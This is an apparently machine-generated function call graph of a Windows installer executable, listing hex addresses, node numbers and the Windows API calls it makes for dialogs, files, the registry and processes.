4492->4493 4494 401cf1 4493->4494 4495 401d07 lstrlenW 4494->4495 4500 401d43 4494->4500 4496 401d11 4495->4496 4496->4500 4501 406009 lstrcpynW 4496->4501 4498 401d2c 4499 401d39 lstrlenW 4498->4499 4498->4500 4499->4500 4501->4498 4502 403cd6 4503 403ce1 4502->4503 4504 403ce5 4503->4504 4505 403ce8 GlobalAlloc 4503->4505 4505->4504 4506 402cd7 4507 401446 18 API calls 4506->4507 4508 402c64 4507->4508 4508->4506 4509 402d99 4508->4509 4510 402d17 ReadFile 4508->4510 4510->4508 4511 402dd8 4512 4030e3 4511->4512 4513 402ddf 4511->4513 4514 402de5 FindClose 4513->4514 4514->4512 4515 401d5c 4516 40145c 18 API calls 4515->4516 4517 401d63 4516->4517 4518 40145c 18 API calls 4517->4518 4519 401d6c 4518->4519 4520 401d73 lstrcmpiW 4519->4520 4521 401d86 lstrcmpW 4519->4521 4522 401d79 4520->4522 4521->4522 4523 401c99 4521->4523 4522->4521 4522->4523 4207 407c5f 4209 407344 4207->4209 4208 407c6d 4209->4208 4210 4073c2 GlobalFree 4209->4210 4211 4073cb GlobalAlloc 4209->4211 4212 407443 GlobalAlloc 4209->4212 4213 40743a GlobalFree 4209->4213 4210->4211 4211->4208 4211->4209 4212->4208 4212->4209 4213->4212 4524 404363 4525 404373 4524->4525 4526 40439c 4524->4526 4527 403d3f 19 API calls 4525->4527 4528 403dca 8 API calls 4526->4528 4530 404380 SetDlgItemTextW 4527->4530 4529 4043a8 4528->4529 4530->4526 4531 4027e3 4532 4027e9 4531->4532 4533 4027f2 4532->4533 4534 402836 4532->4534 4547 401553 4533->4547 4536 40145c 18 API calls 4534->4536 4538 40283d 4536->4538 4537 4027f9 4540 40145c 18 API calls 4537->4540 4545 401a13 4537->4545 4539 4062a3 11 API calls 4538->4539 4541 40284d 4539->4541 4542 40280a RegDeleteValueW 4540->4542 4551 40149d RegOpenKeyExW 4541->4551 4544 4062a3 11 API calls 4542->4544 4546 40282a RegCloseKey 4544->4546 4546->4545 4548 401563 4547->4548 4549 40145c 18 API calls 4548->4549 4550 401589 RegOpenKeyExW 4549->4550 4550->4537 4555 4014c9 4551->4555 4559 401515 4551->4559 4552 4014ef RegEnumKeyW 4553 401501 RegCloseKey 4552->4553 4552->4555 4556 4062fc 3 API calls 4553->4556 4554 401526 RegCloseKey 4554->4559 4555->4552 4555->4553 4555->4554 4557 40149d 3 API calls 4555->4557 4558 401511 4556->4558 4557->4555 4558->4559 4560 401541 RegDeleteKeyW 4558->4560 4559->4545 4560->4559 4561 403f64 4562 403f90 4561->4562 4563 403f74 4561->4563 4565 403fc3 4562->4565 4566 403f96 SHGetPathFromIDListW 4562->4566 4572 405c84 GetDlgItemTextW 4563->4572 4568 403fad SendMessageW 4566->4568 4569 403fa6 4566->4569 4567 403f81 SendMessageW 4567->4562 4568->4565 4570 40141d 80 API calls 4569->4570 4570->4568 4572->4567 4573 402ae4 4574 4030e3 4573->4574 4575 402aeb 4573->4575 4576 402af2 CloseHandle 4575->4576 4576->4574 4577 402065 4578 401446 18 API calls 4577->4578 4579 40206d 4578->4579 4580 401446 18 API calls 4579->4580 4581 402076 GetDlgItem 4580->4581 4582 4030dc 4581->4582 4583 4030e3 4582->4583 4585 405f51 wsprintfW 4582->4585 4585->4583 4586 402665 4587 40145c 18 API calls 4586->4587 4588 40266b 4587->4588 4589 40145c 18 API calls 4588->4589 4590 402674 4589->4590 4591 40145c 18 API calls 4590->4591 4592 40267d 4591->4592 4593 4062a3 11 API calls 4592->4593 4594 40268c 4593->4594 4595 4062d5 2 API calls 4594->4595 4596 402695 4595->4596 4597 4026a6 lstrlenW lstrlenW 4596->4597 4598 404f72 25 API calls 4596->4598 4601 4030e3 4596->4601 4599 404f72 25 API calls 4597->4599 4598->4596 4600 4026e8 SHFileOperationW 4599->4600 4600->4596 4600->4601 4609 401c69 4610 40145c 18 API calls 4609->4610 4611 401c70 4610->4611 4612 4062a3 11 API calls 4611->4612 4613 401c80 4612->4613 4614 405ca0 MessageBoxIndirectW 4613->4614 4615 401a13 4614->4615 4623 402f6e 4624 402f72 4623->4624 4625 402fae 4623->4625 4626 4062a3 11 API calls 4624->4626 4627 40145c 18 API calls 4625->4627 4628 402f7d 4626->4628 4633 402f9d 4627->4633 4629 4062a3 11 API calls 4628->4629 4630 402f90 4629->4630 4631 402fa2 4630->4631 4632 402f98 4630->4632 4635 4060e7 9 API calls 4631->4635 4634 403e74 5 API calls 4632->4634 4634->4633 4635->4633 4636 4023f0 4637 402403 4636->4637 4651 4024da 4636->4651 4638 40145c 18 API calls 4637->4638 4640 40240a 4638->4640 4639 404f72 25 API calls 4645 4024f1 4639->4645 4641 40145c 18 API calls 4640->4641 4642 402413 4641->4642 4643 402429 LoadLibraryExW 4642->4643 4644 40241b GetModuleHandleW 4642->4644 4646 40243e 4643->4646 4647 4024ce 4643->4647 4644->4643 4644->4646 4660 406365 GlobalAlloc WideCharToMultiByte 4646->4660 4649 404f72 25 API calls 4647->4649 4649->4651 4650 402449 4652 40248c 4650->4652 4653 40244f 4650->4653 4651->4639 4654 404f72 25 API calls 4652->4654 4658 40245f 4653->4658 4663 401435 4653->4663 4656 402496 4654->4656 4657 4062a3 11 API calls 4656->4657 4657->4658 4658->4645 4659 4024c0 FreeLibrary 4658->4659 4659->4645 4661 406390 GetProcAddress 4660->4661 4662 40639d GlobalFree 4660->4662 4661->4662 4662->4650 4664 404f72 25 API calls 4663->4664 4665 401443 4664->4665 4665->4658 4666 402df3 4667 4019ec 4666->4667 4668 402dfa 4666->4668 4669 402e07 FindNextFileW 4668->4669 4669->4667 4670 402e16 4669->4670 4672 406009 lstrcpynW 4670->4672 4672->4667 4004 402175 4005 401446 18 API calls 4004->4005 4006 40217c 4005->4006 4007 401446 18 API calls 4006->4007 4008 402186 4007->4008 4009 402197 4008->4009 4010 4062a3 11 API calls 4008->4010 4011 4021aa EnableWindow 4009->4011 4012 40219f ShowWindow 4009->4012 4010->4009 4013 4030e3 4011->4013 4012->4013 4680 404077 4681 404081 4680->4681 4682 404084 lstrcpynW lstrlenW 4680->4682 4681->4682 4030 405479 4031 405491 4030->4031 4032 4055cd 4030->4032 4031->4032 4033 40549d 4031->4033 4034 40561e 4032->4034 4035 4055de GetDlgItem GetDlgItem 4032->4035 4036 4054a8 SetWindowPos 4033->4036 4037 4054bb 4033->4037 4039 405678 4034->4039 4048 40139d 80 API calls 4034->4048 4038 403d3f 19 API calls 4035->4038 4036->4037 4041 4054c0 ShowWindow 4037->4041 4042 4054d8 4037->4042 4043 405608 SetClassLongW 4038->4043 4040 403daf SendMessageW 4039->4040 4044 4055c8 4039->4044 4070 40568a 4040->4070 4041->4042 4045 4054e0 DestroyWindow 4042->4045 4046 4054fa 4042->4046 4047 40141d 80 API calls 4043->4047 4049 4058dc 4045->4049 4050 405510 4046->4050 4051 4054ff SetWindowLongW 4046->4051 4047->4034 4052 405650 4048->4052 4049->4044 4059 40590d ShowWindow 4049->4059 4055 4055b9 4050->4055 4056 40551c GetDlgItem 4050->4056 4051->4044 4052->4039 4057 405654 SendMessageW 4052->4057 4053 40141d 80 API calls 4053->4070 4054 4058de DestroyWindow KiUserCallbackDispatcher 4054->4049 4109 403dca 4055->4109 4060 40554c 4056->4060 4061 40552f SendMessageW IsWindowEnabled 4056->4061 4057->4044 4059->4044 4063 405559 4060->4063 4064 4055a0 SendMessageW 4060->4064 4065 40556c 4060->4065 4074 405551 4060->4074 4061->4044 4061->4060 4062 406805 18 API calls 4062->4070 4063->4064 4063->4074 4064->4055 4067 405574 4065->4067 4068 405589 4065->4068 4071 40141d 80 API calls 4067->4071 4072 40141d 80 API calls 4068->4072 4069 405587 4069->4055 4070->4044 4070->4053 4070->4054 4070->4062 4073 403d3f 19 API calls 4070->4073 4091 40581e DestroyWindow 4070->4091 4100 403d3f 4070->4100 4071->4074 4075 405590 4072->4075 4073->4070 4106 403d18 4074->4106 4075->4055 4075->4074 4077 405705 GetDlgItem 4078 405723 ShowWindow KiUserCallbackDispatcher 4077->4078 4079 40571a 4077->4079 4103 403d85 KiUserCallbackDispatcher 4078->4103 4079->4078 4081 40574d EnableWindow 4084 405761 4081->4084 4082 405766 GetSystemMenu EnableMenuItem SendMessageW 4083 405796 SendMessageW 4082->4083 4082->4084 4083->4084 4084->4082 4104 403d98 SendMessageW 4084->4104 4105 406009 lstrcpynW 4084->4105 4087 4057c4 lstrlenW 4088 406805 18 API calls 4087->4088 4089 4057da SetWindowTextW 4088->4089 4090 40139d 80 API calls 4089->4090 4090->4070 4091->4049 4092 405838 CreateDialogParamW 4091->4092 4092->4049 4093 40586b 4092->4093 4094 403d3f 19 API calls 4093->4094 4095 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4094->4095 4096 40139d 80 API calls 4095->4096 4097 4058bc 4096->4097 4097->4044 4098 4058c4 ShowWindow 4097->4098 4099 403daf SendMessageW 4098->4099 4099->4049 4101 406805 18 API calls 4100->4101 4102 403d4a SetDlgItemTextW 4101->4102 4102->4077 4103->4081 4104->4084 4105->4087 4107 403d25 SendMessageW 4106->4107 4108 403d1f 4106->4108 4107->4069 4108->4107 4110 403ddf GetWindowLongW 4109->4110 4120 403e68 4109->4120 4111 403df0 4110->4111 4110->4120 4112 403e02 4111->4112 4113 403dff GetSysColor 4111->4113 4114 403e12 SetBkMode 4112->4114 4115 403e08 SetTextColor 4112->4115 4113->4112 4116 403e30 4114->4116 4117 403e2a GetSysColor 4114->4117 4115->4114 4118 403e41 4116->4118 4119 403e37 SetBkColor 4116->4119 4117->4116 4118->4120 4121 403e54 DeleteObject 4118->4121 4122 403e5b CreateBrushIndirect 4118->4122 4119->4118 4120->4044 4121->4122 4122->4120 4683 4020f9 GetDC GetDeviceCaps 4684 401446 18 API calls 4683->4684 4685 402116 MulDiv 4684->4685 4686 401446 18 API calls 4685->4686 4687 40212c 4686->4687 4688 406805 18 API calls 4687->4688 4689 402165 CreateFontIndirectW 4688->4689 4690 4030dc 4689->4690 4691 4030e3 4690->4691 4693 405f51 wsprintfW 4690->4693 4693->4691 4694 4024fb 4695 40145c 18 API calls 4694->4695 4696 402502 4695->4696 4697 40145c 18 API calls 4696->4697 4698 40250c 4697->4698 4699 40145c 18 API calls 4698->4699 4700 402515 4699->4700 4701 40145c 18 API calls 4700->4701 4702 40251f 4701->4702 4703 40145c 18 API calls 4702->4703 4704 402529 4703->4704 4705 40253d 4704->4705 4706 40145c 18 API calls 4704->4706 4707 4062a3 11 API calls 4705->4707 4706->4705 4708 40256a CoCreateInstance 4707->4708 4709 40258c 4708->4709 4710 40497c GetDlgItem GetDlgItem 4711 4049d2 7 API calls 4710->4711 4721 404bea 4710->4721 4712 404a76 DeleteObject 4711->4712 4713 404a6a SendMessageW 4711->4713 4714 404a81 4712->4714 4713->4712 4716 404ab8 4714->4716 4718 406805 18 API calls 4714->4718 4715 404ccf 4717 404d74 4715->4717 4723 404bdd 4715->4723 4728 404d1e SendMessageW 4715->4728 4722 403d3f 19 API calls 4716->4722 4719 404d89 4717->4719 4720 404d7d SendMessageW 4717->4720 4725 404a9a SendMessageW SendMessageW 4718->4725 4730 404da2 4719->4730 4731 404d9b ImageList_Destroy 4719->4731 4739 404db2 4719->4739 4720->4719 4721->4715 4726 40484e 5 API calls 4721->4726 4742 404c5a 4721->4742 4727 404acc 4722->4727 4729 403dca 8 API calls 4723->4729 4724 404cc1 SendMessageW 4724->4715 4725->4714 4726->4742 4732 403d3f 19 API calls 4727->4732 4728->4723 4734 404d33 SendMessageW 4728->4734 4735 404f6b 4729->4735 4736 404dab GlobalFree 4730->4736 4730->4739 4731->4730 4745 404add 4732->4745 4733 404f1c 4733->4723 4740 404f31 ShowWindow GetDlgItem ShowWindow 4733->4740 4737 404d46 4734->4737 4736->4739 4747 404d57 SendMessageW 4737->4747 4738 404baa GetWindowLongW SetWindowLongW 4741 404bc4 4738->4741 4739->4733 4746 40141d 80 API calls 4739->4746 4757 404de4 4739->4757 4740->4723 4743 404be2 4741->4743 4744 404bca ShowWindow 4741->4744 4742->4715 4742->4724 4762 403d98 SendMessageW 4743->4762 4761 403d98 SendMessageW 4744->4761 4745->4738 4748 404ba4 4745->4748 4751 404b39 SendMessageW 4745->4751 4752 404b67 SendMessageW 4745->4752 4753 404b7b SendMessageW 4745->4753 4746->4757 4747->4717 4748->4738 4748->4741 4751->4745 4752->4745 4753->4745 4754 404ef3 InvalidateRect 4754->4733 4755 404f09 4754->4755 4763 4043ad 4755->4763 4756 404e12 SendMessageW 4760 404e28 4756->4760 4757->4756 4757->4760 4759 404ea1 SendMessageW SendMessageW 4759->4760 4760->4754 4760->4759 4761->4723 4762->4721 4764 4043cd 4763->4764 4765 406805 18 API calls 4764->4765 4766 40440d 4765->4766 4767 406805 18 API calls 4766->4767 4768 404418 4767->4768 4769 406805 18 API calls 4768->4769 4770 404428 lstrlenW wsprintfW SetDlgItemTextW 4769->4770 4770->4733 4771 4026fc 4773 401ee4 4771->4773 4774 402708 4771->4774 4772 406805 18 API calls 4772->4773 4773->4771 4773->4772 4202 4019fd 4203 40145c 18 API calls 4202->4203 4204 401a04 4203->4204 4205 405e7f 2 API calls 4204->4205 4206 401a0b 4205->4206 4775 4022fd 4776 40145c 18 API calls 4775->4776 4777 402304 GetFileVersionInfoSizeW 4776->4777 4778 4030e3 4777->4778 4779 40232b GlobalAlloc 4777->4779 4779->4778 4780 40233f GetFileVersionInfoW 4779->4780 4781 402350 VerQueryValueW 4780->4781 4782 402381 GlobalFree 4780->4782 4781->4782 4783 402369 4781->4783 4782->4778 4788 405f51 wsprintfW 4783->4788 4786 402375 4789 405f51 wsprintfW 4786->4789 4788->4786 4789->4782 4790 402afd 4791 40145c 18 API calls 4790->4791 4792 402b04 4791->4792 4797 405e50 GetFileAttributesW CreateFileW 4792->4797 4794 402b10 4795 4030e3 4794->4795 4798 405f51 wsprintfW 4794->4798 4797->4794 4798->4795 4799 4029ff 4800 401553 19 API calls 4799->4800 4801 402a09 4800->4801 4802 40145c 18 API calls 4801->4802 4803 402a12 4802->4803 4804 402a1f RegQueryValueExW 4803->4804 4809 401a13 4803->4809 4805 402a45 4804->4805 4806 402a3f 4804->4806 4807 4029e4 RegCloseKey 4805->4807 4805->4809 4806->4805 4810 405f51 wsprintfW 4806->4810 4807->4809 4810->4805 4811 401000 4812 401037 BeginPaint GetClientRect 4811->4812 4813 40100c DefWindowProcW 4811->4813 4815 4010fc 4812->4815 4816 401182 4813->4816 4817 401073 CreateBrushIndirect FillRect DeleteObject 4815->4817 4818 401105 4815->4818 4817->4815 4819 401170 EndPaint 4818->4819 4820 40110b CreateFontIndirectW 4818->4820 4819->4816 4820->4819 4821 40111b 6 API calls 4820->4821 4821->4819 4822 401f80 4823 401446 18 API calls 4822->4823 4824 401f88 4823->4824 4825 401446 18 API calls 4824->4825 4826 401f93 4825->4826 4827 401fa3 4826->4827 4828 40145c 18 API calls 4826->4828 4829 401fb3 4827->4829 4830 40145c 18 API calls 4827->4830 4828->4827 4831 402006 4829->4831 4832 401fbc 4829->4832 4830->4829 4833 40145c 18 API calls 4831->4833 4834 401446 18 API calls 4832->4834 4835 40200d 4833->4835 4836 401fc4 4834->4836 4838 40145c 18 API calls 4835->4838 4837 401446 18 API calls 4836->4837 4839 401fce 4837->4839 4840 402016 FindWindowExW 4838->4840 4841 401ff6 SendMessageW 4839->4841 4842 401fd8 SendMessageTimeoutW 4839->4842 4843 402036 4840->4843 4841->4843 4842->4843 4844 4030e3 4843->4844 4846 405f51 wsprintfW 4843->4846 4846->4844 4847 402082 4848 401446 18 API calls 4847->4848 4849 402093 SetWindowLongW 4848->4849 4850 4030e3 4849->4850 3389 403883 #17 SetErrorMode OleInitialize 3463 4062fc GetModuleHandleA 3389->3463 3393 4038f1 GetCommandLineW 3468 406009 lstrcpynW 3393->3468 3395 403903 GetModuleHandleW 3396 40391b 3395->3396 3469 405d06 3396->3469 3399 4039d6 3400 4039f5 GetTempPathW 3399->3400 3473 4037cc 3400->3473 3402 403a0b 3403 403a33 DeleteFileW 3402->3403 3404 403a0f GetWindowsDirectoryW lstrcatW 3402->3404 3481 403587 GetTickCount GetModuleFileNameW 3403->3481 3406 4037cc 11 API calls 3404->3406 3405 405d06 CharNextW 3408 40393c 3405->3408 3409 403a2b 3406->3409 3408->3399 3408->3405 3419 4039d8 3408->3419 3409->3403 3411 403acc 3409->3411 3410 403a47 3410->3411 3413 403ab1 3410->3413 3415 405d06 CharNextW 3410->3415 3566 403859 3411->3566 3509 40592c 3413->3509 3429 403a5e 3415->3429 3417 403ae1 3573 405ca0 3417->3573 3418 403bce 3423 403c51 3418->3423 3424 4062fc 3 API calls 3418->3424 3577 406009 lstrcpynW 3419->3577 3420 403ac1 3594 4060e7 3420->3594 3426 403bdd 3424->3426 3431 4062fc 3 API calls 3426->3431 3427 403af7 lstrcatW lstrcmpiW 3427->3411 3433 403b13 CreateDirectoryW SetCurrentDirectoryW 3427->3433 3428 403a89 3578 40677e 3428->3578 3429->3427 3429->3428 3434 403be6 3431->3434 3436 403b36 3433->3436 3437 403b2b 3433->3437 3438 4062fc 3 API calls 3434->3438 3608 406009 lstrcpynW 3436->3608 3607 406009 lstrcpynW 3437->3607 3441 403bef 3438->3441 3444 403c3d ExitWindowsEx 3441->3444 3450 403bfd GetCurrentProcess 3441->3450 3443 403b44 3609 406009 lstrcpynW 3443->3609 3444->3423 3447 403c4a 3444->3447 3445 403aa6 3593 406009 lstrcpynW 3445->3593 3637 40141d 3447->3637 3453 403c0d 3450->3453 3453->3444 3454 403b79 CopyFileW 3460 403b53 3454->3460 3455 403bc2 3457 406c68 42 API calls 3455->3457 3458 403bc9 3457->3458 3458->3411 3459 406805 18 API calls 3459->3460 3460->3455 3460->3459 3462 403bad CloseHandle 3460->3462 3610 406805 3460->3610 3629 406c68 3460->3629 3634 405c3f CreateProcessW 3460->3634 3462->3460 3464 406314 LoadLibraryA 3463->3464 3465 40631f GetProcAddress 3463->3465 3464->3465 3466 4038c6 SHGetFileInfoW 3464->3466 3465->3466 3467 406009 lstrcpynW 3466->3467 3467->3393 3468->3395 3470 405d0c 3469->3470 3471 40392a CharNextW 3470->3471 3472 405d13 CharNextW 3470->3472 3471->3408 3472->3470 3640 406038 3473->3640 3475 4037e2 3475->3402 3476 4037d8 3476->3475 3649 406722 lstrlenW CharPrevW 3476->3649 3656 405e50 GetFileAttributesW CreateFileW 3481->3656 3483 4035c7 3503 4035d7 3483->3503 3657 406009 lstrcpynW 3483->3657 3485 4035ed 3658 406751 lstrlenW 3485->3658 3489 4035fe GetFileSize 3490 4036fa 3489->3490 3502 403615 3489->3502 3665 4032d2 3490->3665 3492 403703 3494 40373f GlobalAlloc 3492->3494 3492->3503 3699 403368 SetFilePointer 3492->3699 3676 403368 SetFilePointer 3494->3676 3496 4037bd 3499 4032d2 6 API calls 3496->3499 3498 403720 3501 403336 ReadFile 3498->3501 3499->3503 3500 40375a 3677 40337f 3500->3677 3505 40372b 3501->3505 3502->3490 3502->3496 3502->3503 3506 4032d2 6 API calls 3502->3506 3663 403336 ReadFile 3502->3663 3503->3410 3505->3494 3505->3503 3506->3502 3507 403766 3507->3503 3507->3507 3508 403794 SetFilePointer 3507->3508 3508->3503 3510 4062fc 3 API calls 3509->3510 3511 405940 3510->3511 3512 405946 3511->3512 3513 405958 3511->3513 3740 405f51 wsprintfW 3512->3740 3741 405ed3 RegOpenKeyExW 3513->3741 3517 4059a8 lstrcatW 3519 405956 3517->3519 3518 405ed3 3 API calls 3518->3517 3723 403e95 3519->3723 3522 40677e 18 API calls 3523 4059da 3522->3523 3524 405a70 3523->3524 3526 405ed3 3 API calls 3523->3526 3525 40677e 18 API calls 3524->3525 3527 405a76 3525->3527 3528 405a0c 3526->3528 3529 405a86 3527->3529 3530 406805 18 API calls 3527->3530 3528->3524 3534 405a2f lstrlenW 3528->3534 3540 405d06 CharNextW 3528->3540 3531 405aa6 LoadImageW 3529->3531 3747 403e74 3529->3747 3530->3529 3532 405ad1 RegisterClassW 3531->3532 3533 405b66 3531->3533 3538 405b19 SystemParametersInfoW CreateWindowExW 3532->3538 3565 405b70 3532->3565 3539 40141d 80 API calls 3533->3539 3535 405a63 3534->3535 3536 405a3d lstrcmpiW 3534->3536 3543 406722 3 API calls 3535->3543 3536->3535 3541 405a4d GetFileAttributesW 3536->3541 3538->3533 3544 405b6c 3539->3544 3545 405a2a 3540->3545 3546 405a59 3541->3546 3542 405a9c 3542->3531 3547 405a69 3543->3547 3550 403e95 19 API calls 3544->3550 3544->3565 3545->3534 3546->3535 3548 406751 2 API calls 3546->3548 3746 406009 lstrcpynW 3547->3746 3548->3535 3551 405b7d 3550->3551 3552 405b89 ShowWindow LoadLibraryW 3551->3552 3553 405c0c 3551->3553 3555 405ba8 LoadLibraryW 3552->3555 3556 405baf GetClassInfoW 3552->3556 3732 405047 OleInitialize 3553->3732 3555->3556 3557 405bc3 GetClassInfoW RegisterClassW 3556->3557 3558 405bd9 DialogBoxParamW 3556->3558 3557->3558 3560 40141d 80 API calls 3558->3560 3559 405c12 3561 405c16 3559->3561 3562 405c2e 3559->3562 3560->3565 3564 40141d 80 API calls 3561->3564 3561->3565 3563 40141d 80 API calls 3562->3563 3563->3565 3564->3565 3565->3420 3567 403871 3566->3567 3568 403863 CloseHandle 3566->3568 3892 403c83 3567->3892 3568->3567 3574 405cb5 3573->3574 3575 403aef ExitProcess 3574->3575 3576 405ccb MessageBoxIndirectW 3574->3576 3576->3575 3577->3400 3949 406009 lstrcpynW 3578->3949 3580 40678f 3581 405d59 4 API calls 3580->3581 3582 406795 3581->3582 3583 406038 5 API calls 3582->3583 3590 403a97 3582->3590 3589 4067a5 3583->3589 3584 4067dd lstrlenW 3585 4067e4 3584->3585 3584->3589 3586 406722 3 API calls 3585->3586 3588 4067ea GetFileAttributesW 3586->3588 3587 4062d5 2 API calls 3587->3589 3588->3590 3589->3584 3589->3587 3589->3590 3591 406751 2 API calls 3589->3591 3590->3411 3592 406009 lstrcpynW 3590->3592 3591->3584 3592->3445 3593->3413 3595 4060f3 3594->3595 3598 406110 3594->3598 3596 4060fd CloseHandle 3595->3596 3597 406104 3595->3597 3596->3597 3597->3411 3598->3597 3599 406187 3598->3599 3600 40612d 3598->3600 3599->3597 3601 406190 lstrcatW lstrlenW WriteFile 3599->3601 3600->3601 3602 406136 GetFileAttributesW 3600->3602 3601->3597 3950 405e50 GetFileAttributesW CreateFileW 3602->3950 3604 406152 3604->3597 3605 406162 WriteFile 3604->3605 3606 40617c SetFilePointer 3604->3606 3605->3606 3606->3599 3607->3436 3608->3443 3609->3460 3612 406812 3610->3612 3611 406a7f 3613 403b6c DeleteFileW 3611->3613 3953 406009 lstrcpynW 3611->3953 3612->3611 3615 4068d3 GetVersion 3612->3615 3616 406a46 lstrlenW 3612->3616 3617 406805 10 API calls 3612->3617 3623 406038 5 API calls 3612->3623 3951 405f51 wsprintfW 3612->3951 3952 406009 lstrcpynW 3612->3952 3613->3454 3613->3460 3626 4068e0 3615->3626 3616->3612 3617->3616 3620 405ed3 3 API calls 3620->3626 3621 406952 GetSystemDirectoryW 3621->3626 3622 406965 GetWindowsDirectoryW 3622->3626 3623->3612 3624 406805 10 API calls 3624->3626 3625 4069df lstrcatW 3625->3612 3626->3612 3626->3620 3626->3621 3626->3622 3626->3624 3626->3625 3627 406999 SHGetSpecialFolderLocation 3626->3627 3627->3626 3628 4069b1 SHGetPathFromIDListW CoTaskMemFree 3627->3628 3628->3626 3630 4062fc 3 API calls 3629->3630 3631 406c6f 3630->3631 3633 406c90 3631->3633 3954 406a99 lstrcpyW 3631->3954 3633->3460 3635 405c7a 3634->3635 3636 405c6e CloseHandle 3634->3636 3635->3460 3636->3635 3638 40139d 80 API calls 3637->3638 3639 401432 3638->3639 3639->3423 3647 406045 3640->3647 3641 4060c1 CharPrevW 3645 4060bb 3641->3645 3642 4060ae CharNextW 3642->3645 3642->3647 3643 4060e1 3643->3476 3644 405d06 CharNextW 3644->3647 3645->3641 3645->3643 3646 40609a CharNextW 3646->3647 3647->3642 3647->3644 3647->3645 3647->3646 3648 4060a9 CharNextW 3647->3648 3648->3642 3650 4037ea CreateDirectoryW 3649->3650 3651 40673f lstrcatW 3649->3651 3652 405e7f 3650->3652 3651->3650 3653 405e8c GetTickCount GetTempFileNameW 3652->3653 3654 405ec2 3653->3654 3655 4037fe 3653->3655 3654->3653 3654->3655 3655->3402 3656->3483 3657->3485 3659 406760 3658->3659 3660 4035f3 3659->3660 3661 406766 CharPrevW 3659->3661 3662 406009 lstrcpynW 3660->3662 3661->3659 3661->3660 3662->3489 3664 403357 3663->3664 3664->3502 3666 4032f3 3665->3666 3667 4032db 3665->3667 3670 403303 GetTickCount 3666->3670 3671 4032fb 3666->3671 3668 4032e4 DestroyWindow 3667->3668 3669 4032eb 3667->3669 3668->3669 3669->3492 3673 403311 CreateDialogParamW ShowWindow 3670->3673 3674 403334 3670->3674 3700 406332 3671->3700 3673->3674 3674->3492 3676->3500 3679 403398 3677->3679 3678 4033c3 3681 403336 ReadFile 3678->3681 3679->3678 3722 403368 SetFilePointer 3679->3722 3682 4033ce 3681->3682 3683 4033e7 GetTickCount 3682->3683 3684 403518 3682->3684 3686 4033d2 3682->3686 3696 4033fa 3683->3696 3685 40351c 3684->3685 3690 403540 3684->3690 3687 403336 ReadFile 3685->3687 3686->3507 3687->3686 3688 403336 ReadFile 3688->3690 3689 403336 ReadFile 3689->3696 3690->3686 3690->3688 3691 40355f WriteFile 3690->3691 3691->3686 3692 403574 3691->3692 3692->3686 3692->3690 3694 40345c GetTickCount 3694->3696 3695 403485 MulDiv wsprintfW 3711 404f72 3695->3711 3696->3686 3696->3689 3696->3694 3696->3695 3698 4034c9 WriteFile 3696->3698 3704 407312 3696->3704 3698->3686 3698->3696 3699->3498 3701 40634f PeekMessageW 3700->3701 3702 406345 DispatchMessageW 3701->3702 3703 403301 3701->3703 3702->3701 3703->3492 3705 407332 3704->3705 3706 40733a 3704->3706 3705->3696 3706->3705 3707 4073c2 GlobalFree 3706->3707 3708 4073cb GlobalAlloc 3706->3708 3709 407443 GlobalAlloc 3706->3709 3710 40743a GlobalFree 3706->3710 3707->3708 3708->3705 3708->3706 3709->3705 3709->3706 3710->3709 3712 404f8b 3711->3712 3717 40502f 3711->3717 3713 404fa9 lstrlenW 3712->3713 3714 406805 18 API calls 3712->3714 3715 404fd2 3713->3715 3716 404fb7 lstrlenW 3713->3716 3714->3713 3719 404fe5 3715->3719 3720 404fd8 SetWindowTextW 3715->3720 3716->3717 3718 404fc9 lstrcatW 3716->3718 3717->3696 3718->3715 3719->3717 3721 404feb SendMessageW SendMessageW SendMessageW 3719->3721 3720->3719 3721->3717 3722->3678 3724 403ea9 3723->3724 3752 405f51 wsprintfW 3724->3752 3726 403f1d 3727 406805 18 API calls 3726->3727 3728 403f29 SetWindowTextW 3727->3728 3729 403f44 3728->3729 3730 403f5f 3729->3730 3731 406805 18 API calls 3729->3731 3730->3522 3731->3729 3753 403daf 3732->3753 3734 40506a 3737 4062a3 11 API calls 3734->3737 3739 405095 3734->3739 3756 40139d 3734->3756 3735 403daf SendMessageW 3736 4050a5 OleUninitialize 3735->3736 3736->3559 3737->3734 3739->3735 3740->3519 3742 405f07 RegQueryValueExW 3741->3742 3743 405989 3741->3743 3744 405f29 RegCloseKey 3742->3744 3743->3517 3743->3518 3744->3743 3746->3524 3891 406009 lstrcpynW 3747->3891 3749 403e88 3750 406722 3 API calls 3749->3750 3751 403e8e lstrcatW 3750->3751 3751->3542 3752->3726 3754 403dc7 3753->3754 3755 403db8 SendMessageW 3753->3755 3754->3734 3755->3754 3759 4013a4 3756->3759 3757 401410 3757->3734 3759->3757 3760 4013dd MulDiv SendMessageW 3759->3760 3761 4015a0 3759->3761 3760->3759 3762 4015fa 3761->3762 3840 40160c 3761->3840 3763 401601 3762->3763 3764 401742 3762->3764 3765 401962 3762->3765 3766 4019ca 3762->3766 3767 40176e 3762->3767 3768 4017b1 3762->3768 3769 401672 3762->3769 3770 401693 3762->3770 3771 401616 3762->3771 3772 401897 3762->3772 3773 4018db 3762->3773 3774 40163c 3762->3774 3775 4016bd 3762->3775 3784 4016d6 3762->3784 3786 401736 3762->3786 3789 401650 3762->3789 3762->3840 3779 4062a3 11 API calls 3763->3779 3787 401751 ShowWindow 3764->3787 3788 401758 3764->3788 3776 40145c 18 API calls 3765->3776 3783 40145c 18 API calls 3766->3783 3790 40145c 18 API calls 3767->3790 3874 40145c 3768->3874 3791 40145c 18 API calls 3769->3791 3868 401446 3770->3868 3782 40145c 18 API calls 3771->3782 3792 40145c 18 API calls 3772->3792 3780 40145c 18 API calls 3773->3780 3785 401647 PostQuitMessage 3774->3785 3774->3840 3781 4062a3 11 API calls 3775->3781 3794 401968 GetFullPathNameW 3776->3794 3779->3840 3797 4018e2 3780->3797 3798 4016c7 SetForegroundWindow 3781->3798 3799 40161c 3782->3799 3800 4019d1 SearchPathW 3783->3800 3801 401446 18 API calls 3784->3801 3784->3840 3785->3840 3786->3840 3890 405f51 wsprintfW 3786->3890 3787->3788 3802 401765 ShowWindow 3788->3802 3788->3840 3813 4062a3 11 API calls 3789->3813 3803 401775 3790->3803 3804 401678 3791->3804 3793 40189d 3792->3793 3886 4062d5 FindFirstFileW 3793->3886 3806 4019a1 3794->3806 3807 40197f 3794->3807 3796 40169a 3871 4062a3 lstrlenW wvsprintfW 3796->3871 3811 40145c 18 API calls 3797->3811 3798->3840 3812 4062a3 11 API calls 3799->3812 3800->3840 3801->3840 3802->3840 3814 4062a3 11 API calls 3803->3814 3815 4062a3 11 API calls 3804->3815 3828 4019b8 